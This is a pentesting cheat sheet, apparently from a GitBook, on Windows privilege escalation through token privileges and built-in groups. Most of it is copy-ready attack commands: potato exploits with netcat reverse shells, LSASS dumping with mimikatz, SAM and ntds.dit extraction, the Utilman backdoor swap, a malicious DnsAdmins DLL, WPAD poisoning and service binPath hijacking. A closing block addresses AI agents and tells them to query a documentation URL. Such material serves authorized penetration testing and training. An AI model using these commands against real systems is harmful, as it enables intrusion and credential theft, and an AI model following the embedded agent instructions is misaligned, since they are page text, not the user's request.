# Windows Privilege Escalation with Groups and Privileges {% embed url="" %} ## [Full List](https://github.com/gtworek/Priv2Admin) ## nt authority\local service With [FullPowers](https://github.com/itm4n/FullPowers) {% code overflow="wrap" %} ```powershell .\FullPowers.exe whoami /priv ``` {% endcode %} ## SeImpersonate & SeAssignPrimaryToken These privileges can be used to impersonate a privileged account such as SYSTEM.\ Often these privileges are found in services such as Web, SQL, etc.\ Named pipes are used for local and remote *Inter-Process* communication. You have to create a named pipe and convince a privileged process to connect. After connecting, with SeImpersonatePrivilege you can impersonate that account and perform operations in its security context. See [Potatoes](https://jlajara.gitlab.io/Potatoes_Windows_Privesc). ### [SigmaPotato](https://github.com/tylerdotrar/SigmaPotato) {% code overflow="wrap" %} ```powershell .\SigmaPotato.exe "" .\SigmaPotato.exe --revshell ``` {% endcode %} ### [GodPotato](https://github.com/BeichenDream/GodPotato) {% code overflow="wrap" %} ```powershell .\GodPotato.exe -cmd "" ``` {% endcode %} ### [RasmanPotato](https://github.com/crisprss/RasmanPotato) {% code overflow="wrap" %} ```powershell .\RasMan.exe -c "" -i [1/2] ``` {% endcode %} ### [JuicyPotato](https://github.com/ohpe/juicy-potato) {% code overflow="wrap" %} ```powershell JuicyPotato.exe -l -p -a -t * [-c <{clsid}>] ``` {% endcode %} **!!** Set `-c <{clsid}>` if necessary. {% code overflow="wrap" %} ```powershell JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe -e cmd.exe" -t * ``` {% endcode %} ### [PrintSpoofer](https://github.com/itm4n/PrintSpoofer) For Windows 10 and Server 2016/2019. {% code overflow="wrap" %} ```powershell PrintSpoofer.exe -i -c powershell.exe ``` {% endcode %} ex. {% code overflow="wrap" %} ```powershell PrintSpoofer.exe -c "c:\tools\nc.exe -e cmd" ``` {% endcode %} ### [Metasploit](/rednote/utility/c2-and-exploitation-framework/metasploit.md) In meterpreter session 
load incognito
list_tokens -u  # to see token list
impersonate_token  “<GetFromDelegationToken>”
## SeDebug This privilege can be used to acquire sensitive information from system memory or elevate our privileges to SYSTEM. ### Dump lsass ``` Task Manager > right click LSAProcess > Create dump file ``` or with [procdump.exe](https://learn.microsoft.com/en-us/sysinternals/downloads/procdump) {% code overflow="wrap" %} ```powershell procdump.exe -accepteula -ma lsass.exe lsass.dmp ``` {% endcode %} Then extract hashes with [mimikatz](https://github.com/gentilkiwi/mimikatz) or [pypykatz](https://github.com/skelsec/pypykatz) {% code overflow="wrap" %} ```powershell mimikatz.exe > sekurlsa::minidump lsass.dmp > sekurlsa::logonpasswords ``` {% endcode %} ### Privileged Shell With [psgetsystem](https://github.com/decoder-it/psgetsystem) {% code overflow="wrap" %} ```powershell tasklist # take PID of winlogon.exe for example ``` {% endcode %} {% code overflow="wrap" %} ```powershell . .\psgetsys.ps1 ImpersonateFromParentPid -ppid -command -cmdargs ``` {% endcode %} ## SeTakeOwnership With this privilege, a user could take ownership of any file or object and make changes that could result in access to sensitive data, RCE, or DoS. {% code overflow="wrap" %} ```powershell takeown /f '' icacls /grant :f ``` {% endcode %} ## SeBackupPrivilege ([Backup Operators](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn579255\(v=ws.11\)?redirectedfrom=MSDN#backup-operators)) The SeBackupPrivilege allows us to traverse any folder and list the folder contents. This will let us copy a file from a folder, even if there is no access control entry (ACE) for us in the folder's access control list (ACL). However, we can't do this using the standard copy command. Instead, we need to programmatically copy the data, making sure to specify the [FILE\_FLAG\_BACKUP\_SEMANTICS](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilea) flag. ```powershell reg save hklm\system system reg save hklm\sam sam ``` ## SeRestorePrivilege {% code overflow="wrap" %} ```powershell cd C:\Windows\system32 ren Utilman.exe Utilman.old ren cmd.exe Utilman.exe ``` {% endcode %} {% code overflow="wrap" %} ```bash rdesktop -u random -p random $target ``` {% endcode %} When we’re on the RDP login panel, press `WIN+U` Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. ### Read Sensitive Data With [SeBackupPrivilege](https://github.com/giuliano108/SeBackupPrivilege/tree/master) {% code overflow="wrap" %} ```powershell Import-Module .\SeBackupPrivilegeUtils.dll Import-Module .\SeBackupPrivilegeCmdLets.dll Set-SeBackupPrivilege ``` {% endcode %} {% code overflow="wrap" %} ```powershell Copy-FileSeBackupPrivilege cat ``` {% endcode %} ### Get ntds.dit from DC Shadow copy of the drive with [diskshadow.exe](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow) {% code overflow="wrap" %} ```powershell diskshadow.exe > set verbose on > set metadata C:\Windows\Temp\meta.cab > set context clientaccessible > set context persistent > begin backup > add volume C: alias cdrive > create > expose %cdrive% E: > end backup > exit ``` {% endcode %} Now we copy the ntds.dit file from drive E which, unlike the one in C, is not used by another process and therefore readable. {% code overflow="wrap" %} ```powershell Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\ntds.dit ``` {% endcode %} Or with [robocopy](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/robocopy) {% code overflow="wrap" %} ```powershell robocopy /B E:\Windows\NTDS .\ntds ntds.dit ``` {% endcode %} ## [Event Log Readers](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn579255\(v=ws.11\)?redirectedfrom=MSDN#event-log-readers) Many Windows commands support passing a password as a parameter, and if process command line checking is enabled, this sensitive information will be captured. If you are part of the Event Log Readers group we can query Windows events from the command line using the [wevtutil](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil) utility and the PowerShell Get-WinEvent cmdlet looking for sensitive information. In PowerShell {% code overflow="wrap" %} ```powershell wevtutil qe Security /rd:true /f:text | Select-String "/user" ``` {% endcode %} {% code overflow="wrap" %} ```powershell wevtutil qe Security /rd:true /f:text /r: /u: /p: | Select-String "/user" ``` {% endcode %} {% code overflow="wrap" %} ```powershell Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*' } | ForEach-Object { $_.Properties[8].Value } ``` {% endcode %} ## [DnsAdmins](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn579255\(v=ws.11\)?redirectedfrom=MSDN#dnsadmins) The DNS service is run with SYSTEM privileges. If you are part of the DnsAdmin group you can use the [dnscmd](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd) utility to load a custom DLL with zero verification. When DNS is restarted, the DLL will be executed. the following attack can be executed when DNS is run on a Domain Controller (which is very common) ### DLL Attack #### Create DLL {% code overflow="wrap" %} ```powershell msfvenom -p windows/x64/exec cmd='' -f dll -o .dll ``` {% endcode %} Or enter `system(“”);` under `fclose` in [kdns.c](https://github.com/gentilkiwi/mimikatz/blob/master/mimilib/kdns.c) and compile the project to get the modified **mimilib.dll**. The payload is executed for each query to the DNS service and all DNS queries will be logged in C:\Windows\system32\kiwidns.log #### Load DLL {% code overflow="wrap" %} ```powershell # Locally dnscmd.exe /config /serverlevelplugindll ``` {% endcode %} {% code overflow="wrap" %} ```powershell # Remotely dnscmd.exe /config /serverlevelplugindll \\\ ``` {% endcode %} 
# check
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll
#### Restart DNS Or wait for reboot if you don't have permissions. {% code overflow="wrap" %} ```powershell # Locally sc.exe stop dns sc.exe start dns ``` {% endcode %} {% code overflow="wrap" %} ```powershell # Remotely sc.exe \\ stop dns sc.exe \\ start dns ``` {% endcode %} #### Cleaning Up Must be taken from an elevated console with a local or domain admin account.\ Until our custom DLL is removed, we will not be able to properly start the DNS service again. {% code overflow="wrap" %} ```powershell # Check reg query \\\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters ``` {% endcode %} {% code overflow="wrap" %} ```powershell # Remove reg delete \\\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll ``` {% endcode %} {% code overflow="wrap" %} ```powershell # Restart sc.exe start dns sc.exe query dns # check if state is running ``` {% endcode %} ### WPAD Attck We need to disable the global query block list and creating a WPAD record. Every machine running WPAD with default settings will have its traffic proxied through our attack machine. We could use a tool such as [Responder](https://github.com/lgandx/Responder) or [Inveigh](https://github.com/Kevin-Robertson/Inveigh) to perform traffic spoofing, and attempt to capture password hashes and crack them offline or perform an SMBRelay attack. {% code overflow="wrap" %} ```powershell # Disabling the Global Query Block List Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.inlanefreight.local ``` {% endcode %} 
# Adding a WPAD Record
Add-DnsServerResourceRecordA -Name wpad -ZoneName inlanefreight.local -ComputerName dc01.inlanefreight.local -IPv4Address 10.10.14.3
## [Print Operators](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn579255\(v=ws.11\)?redirectedfrom=MSDN#print-operators) Grants its members the `SeLoadDriverPrivilege`.\ If we issue the command `whoami /priv`, and don't see the `SeLoadDriverPrivilege` from an unelevated context, we will need to bypass UAC. Alternatively, from a GUI, we can open an administrative command shell. Download the [Capcom.sys](https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys) driver.\ Use [EoPLoadDriver](https://github.com/TarlogicSecurity/EoPLoadDriver/) to automate the process of enabling the privilege, creating the registry key, and executing `NTLoadDriver` to load the driver. {% code overflow="wrap" %} ```powershell EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\\Capcom.sys ``` {% endcode %} Use [ExploitCapcom](https://github.com/tandasat/ExploitCapcom) to explit Capcom.sys ``` .\ExploitCapcom.exe ``` *If we do not have GUI access to the target, we will have to modify the `ExploitCapcom.cpp` code before compiling, line 292, with* [*msfvenom*](/rednote/pentesting-process/software-attacks/shellcode.md#msfvenom) *payload.* **Note**: Since Windows 10 Version 1803, the "`SeLoadDriverPrivilege`" is not exploitable, as it is no longer possible to include references to registry keys under "`HKEY_CURRENT_USER`". ## [Server Operators](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn579255\(v=ws.11\)?redirectedfrom=MSDN#server-operators) The Server Operators group allows members to administer Windows servers without needing assignment of Domain Admin privileges. It is a very highly privileged group that can log in locally to servers, including Domain Controllers. Membership of this group confers the powerful `SeBackupPrivilege` and `SeRestorePrivilege` privileges and the ability to control local services. #### Querying Service {% code overflow="wrap" %} ```powershell sc.exe qc AppReadiness ``` {% endcode %} {% code overflow="wrap" %} ```powershell sc.exe qc VMTools ``` {% endcode %} #### Modifying the Service Binary Path {% code overflow="wrap" %} ```powershell sc.exe config AppReadiness binPath= "cmd /c " ``` {% endcode %} {% code overflow="wrap" %} ```powershell sc.exe config VMTools binPath= "cmd /c " ``` {% endcode %} #### Start the service {% code overflow="wrap" %} ```powershell sc.exe stop AppReadiness sc.exe start AppReadiness ``` {% endcode %} {% code overflow="wrap" %} ```powershell sc.exe stop VMTools sc.exe start VMTools ``` {% endcode %} The service startup fails, as expected, but the command will be executed correctly. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ivalexev.gitbook.io/rednote/pentesting-process/privilege-escalation/windows/windows-privilege-escalation-with-groups-and-privileges.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.